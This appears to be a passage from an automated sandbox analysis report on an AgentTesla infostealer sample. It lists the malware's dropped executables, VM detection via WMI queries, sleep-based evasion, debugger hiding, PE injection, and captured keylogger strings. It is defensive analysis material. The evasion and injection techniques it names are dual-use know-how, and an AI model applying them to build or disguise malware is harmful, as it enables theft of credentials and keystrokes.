                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWindow / User API: threadDelayed 7353
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWindow / User API: threadDelayed 2687
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2808Thread sleep time: -540000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1924Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928Thread sleep count: 7353 > 30
                      Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928Thread sleep count: 234 > 30
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1408Thread sleep time: -480000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1464Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 2144Thread sleep count: 2687 > 30
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1880Thread sleep count: 130 > 30
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeLast function: Thread delayed
                      Source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00617128 LdrInitializeThunk,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory written: C:\Users\user\AppData\Roaming\twox67345.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory written: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmpBinary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
                      Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmpBinary or memory string: Program Manager48
                      Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmpBinary or memory string: my<br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br>|
                      Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmpBinary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
                      Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmpBinary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>
                      Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmpBinary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r\
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeQueries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeQueries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeQueries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeQueries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeQueries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
